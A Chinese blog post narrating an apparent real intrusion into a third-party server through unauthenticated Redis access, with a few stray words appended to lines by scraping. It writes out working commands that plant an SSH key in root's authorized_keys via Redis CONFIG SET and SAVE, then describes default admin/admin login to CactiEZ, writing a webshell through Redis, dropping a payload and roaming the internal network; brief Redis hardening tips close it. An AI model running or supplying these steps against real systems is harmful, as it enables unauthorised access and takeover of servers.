最近redis的話題比較多,所以就有了下面這個故事。html
目標IP:210.73.90.xxxweb
利用漏洞:未受權的redis訪問redis
漏洞利用1:shell
1)本地生成祕鑰安全
root@GanDolf:~# ssh-keygen -t rsa服務器
2)將公鑰寫入一個文件ssh
root@GanDolf:~# cd /root/.ssh/ide
root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt網站
3)鏈接redis寫入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackitspa
OK
root@GanDolf:~/.ssh# redis-cli -h 210.73.90.xxx
210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh
4)鏈接服務器
root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx
發現爲開啓22端口
到此此方法失敗
漏洞利用2:
nmap掃描結果:
80 443 開放
訪問80原來是CactiEZ v10版本
嘗試弱口令登陸admin admin登陸成功,發現無長傳路徑。
嘗試redis寫webshell
前提:網站的物理路徑
手動幾回沒爆成功
轉向挖CactiEZ v10 的一些安裝信息
因而乎,下載CactiEZ v10 本身搭建虛擬安裝,啓動找出物理路徑爲:
/var/www/html
因而利用redis寫shell
因而菜刀連起:
最後丟個小碼。看看能不能挖到啥東西,後續能夠反彈到本地,內容漫遊下(好多交換機,主機^__^)
最後總結關於redis的安全建議:
1)修改默認端口
2)監聽本地端口
3)使用非root啓動,不然出現漏洞1,直接拿到root權限
4)修改配置文件,禁用相關命令
# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52